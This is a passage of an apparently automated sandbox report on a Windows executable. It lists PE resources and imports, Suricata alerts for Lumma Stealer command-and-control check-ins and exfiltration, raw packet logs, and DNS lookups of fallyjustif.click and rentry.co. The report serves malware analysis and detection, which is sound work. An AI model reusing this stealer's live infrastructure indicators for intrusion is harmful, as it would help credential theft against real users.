.reloc	0x107000	0xfd6	0x1000	98b5852fe7cbf1ae227944ba00d536ab	False	0.567626953125	data	5.312168663390484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x100268	0x1f50	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0013722554890219
RT_ICON	0x1021b8	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.4860659072416599
RT_ICON	0x104820	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.5398451730418944
RT_ICON	0x105948	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.650709219858156
RT_DIALOG	0x105db0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x105eb0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x105fcc	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x10602c	0x3e	data	English	United States	0.8225806451612904
RT_VERSION	0x10606c	0x3a0	data	English	United States	0.4105603448275862
RT_MANIFEST	0x10640c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T21:35:52.982519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.37.209	443	TCP
2024-12-28T21:35:53.839595+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	104.21.37.209	443	TCP
2024-12-28T21:35:53.839595+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.37.209	443	TCP
2024-12-28T21:35:55.105526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.37.209	443	TCP
2024-12-28T21:35:55.897918+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	104.21.37.209	443	TCP
2024-12-28T21:35:55.897918+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.37.209	443	TCP
2024-12-28T21:35:57.741369+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.37.209	443	TCP
2024-12-28T21:36:00.002405+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	104.21.37.209	443	TCP
2024-12-28T21:36:02.211154+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49753	104.21.37.209	443	TCP
2024-12-28T21:36:04.685957+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49759	104.21.37.209	443	TCP
2024-12-28T21:36:05.504971+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49759	104.21.37.209	443	TCP
2024-12-28T21:36:07.125925+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49765	104.21.37.209	443	TCP
2024-12-28T21:36:10.815856+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49774	104.21.37.209	443	TCP
2024-12-28T21:36:11.594130+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49774	104.21.37.209	443	TCP
2024-12-28T21:36:13.030490+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49779	104.26.3.16	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 21:35:51.668456078 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:51.668497086 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:51.668764114 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:51.672116041 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:51.672143936 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:52.982444048 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:52.982518911 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:52.987103939 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:52.987112045 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:52.987339973 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.039464951 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.067199945 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.067219019 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.067280054 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.839585066 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.839663029 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.839716911 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.841383934 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.841404915 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.841414928 CET	49737	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.841420889 CET	443	49737	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.848247051 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.848272085 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:53.848373890 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.848623991 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:53.848632097 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.105421066 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.105525970 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.112876892 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.112884998 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.113081932 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.114171028 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.114191055 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.114229918 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.897921085 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.897985935 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.898013115 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.898032904 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.898042917 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.898077011 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.898082972 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.898169041 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.898206949 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.898211956 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.914756060 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.914803982 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.914810896 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.922960997 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.923022032 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:55.923057079 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:55.976964951 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.099124908 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103002071 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103091955 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103190899 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.103213072 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103264093 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.103283882 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103420973 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103435993 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.103450060 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103471041 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.103477001 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.103496075 CET	49738	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.103499889 CET	443	49738	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.483938932 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.483983994 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:56.484042883 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.484364033 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:56.484376907 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:57.741296053 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:57.741369009 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:57.742533922 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:57.742547035 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:57.742748022 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:57.745794058 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:57.745933056 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:57.745976925 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:57.746047020 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:57.746056080 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:58.720674992 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:58.720746040 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:58.720798969 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:58.721009970 CET	49740	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:58.721024036 CET	443	49740	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:58.742230892 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:58.742257118 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:35:58.742347956 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:58.744616985 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:35:58.744623899 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.002326965 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.002404928 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.003612041 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.003638983 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.004085064 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.005491018 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.005594015 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.005611897 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.872997999 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.873075008 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.873152971 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.873347998 CET	49747	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.873357058 CET	443	49747	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.950428009 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.950455904 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:00.950529099 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.950814009 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:00.950825930 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:02.211045980 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:02.211153984 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:02.212357044 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:02.212366104 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:02.212560892 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:02.213895082 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:02.214072943 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:02.214101076 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:02.214163065 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:02.214171886 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:03.194732904 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:03.194813013 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:03.194864035 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:03.195178986 CET	49753	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:03.195185900 CET	443	49753	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:03.427989006 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:03.428049088 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:03.428123951 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:03.428388119 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:03.428423882 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:04.685878038 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:04.685956955 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:04.687058926 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:04.687063932 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:04.687273979 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:04.688379049 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:04.688473940 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:04.688486099 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:05.504987001 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:05.505068064 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:05.505117893 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:05.505228043 CET	49759	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:05.505254030 CET	443	49759	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:05.814589977 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:05.814663887 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:05.814745903 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:05.815056086 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:05.815073967 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.125750065 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.125925064 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.126933098 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.126946926 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.127443075 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.128505945 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.129059076 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.129092932 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.129193068 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.129229069 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.129600048 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.129642010 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.133330107 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.133363962 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.134535074 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.134568930 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.138540983 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.138570070 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.138580084 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.138592958 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.138736010 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.138758898 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.138778925 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.141263962 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.141295910 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.179383039 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.180107117 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.180146933 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.180176020 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.180188894 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:07.180210114 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:07.180226088 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:09.551875114 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:09.551958084 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:09.554455042 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:09.554517984 CET	49765	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:09.554526091 CET	443	49765	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:09.555819035 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:09.555849075 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:09.555994987 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:09.556211948 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:09.556225061 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:10.815774918 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:10.815855980 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:10.826842070 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:10.826854944 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:10.827112913 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:10.843421936 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:10.843460083 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:10.843483925 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:11.593997955 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:11.594070911 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:11.594199896 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:11.594304085 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:11.594316006 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:11.594327927 CET	49774	443	192.168.2.4	104.21.37.209
Dec 28, 2024 21:36:11.594332933 CET	443	49774	104.21.37.209	192.168.2.4
Dec 28, 2024 21:36:11.816576958 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:11.816598892 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:11.816683054 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:11.817102909 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:11.817116022 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.030361891 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.030489922 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.031907082 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.031915903 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.032114029 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.033128977 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.079338074 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808465958 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808506966 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808533907 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808562040 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808578968 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.808593988 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808614016 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.808659077 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.808938980 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.809072018 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.809078932 CET	443	49779	104.26.3.16	192.168.2.4
Dec 28, 2024 21:36:13.809098005 CET	49779	443	192.168.2.4	104.26.3.16
Dec 28, 2024 21:36:13.809102058 CET	443	49779	104.26.3.16	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 21:35:05.242790937 CET	53268	53	192.168.2.4	1.1.1.1
Dec 28, 2024 21:35:05.458297968 CET	53	53268	1.1.1.1	192.168.2.4
Dec 28, 2024 21:35:51.340529919 CET	56784	53	192.168.2.4	1.1.1.1
Dec 28, 2024 21:35:51.663081884 CET	53	56784	1.1.1.1	192.168.2.4
Dec 28, 2024 21:36:11.596662045 CET	52094	53	192.168.2.4	1.1.1.1
Dec 28, 2024 21:36:11.815766096 CET	53	52094	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 21:35:05.242790937 CET	192.168.2.4	1.1.1.1	0xce49	Standard query (0)	xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:35:51.340529919 CET	192.168.2.4	1.1.1.1	0x77a8	Standard query (0)	fallyjustif.click	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:36:11.596662045 CET	192.168.2.4	1.1.1.1	0x91a8	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 21:35:05.458297968 CET	1.1.1.1	192.168.2.4	0xce49	Name error (3)	xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:35:51.663081884 CET	1.1.1.1	192.168.2.4	0x77a8	No error (0)	fallyjustif.click		104.21.37.209	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:35:51.663081884 CET	1.1.1.1	192.168.2.4	0x77a8	No error (0)	fallyjustif.click		172.67.213.115	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:36:11.815766096 CET	1.1.1.1	192.168.2.4	0x91a8	No error (0)	rentry.co		104.26.3.16	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:36:11.815766096 CET	1.1.1.1	192.168.2.4	0x91a8	No error (0)	rentry.co		104.26.2.16	A (IP address)	IN (0x0001)	false
Dec 28, 2024 21:36:11.815766096 CET	1.1.1.1	192.168.2.4	0x91a8	No error (0)	rentry.co		172.67.75.40	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fallyjustif.click

rentry.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
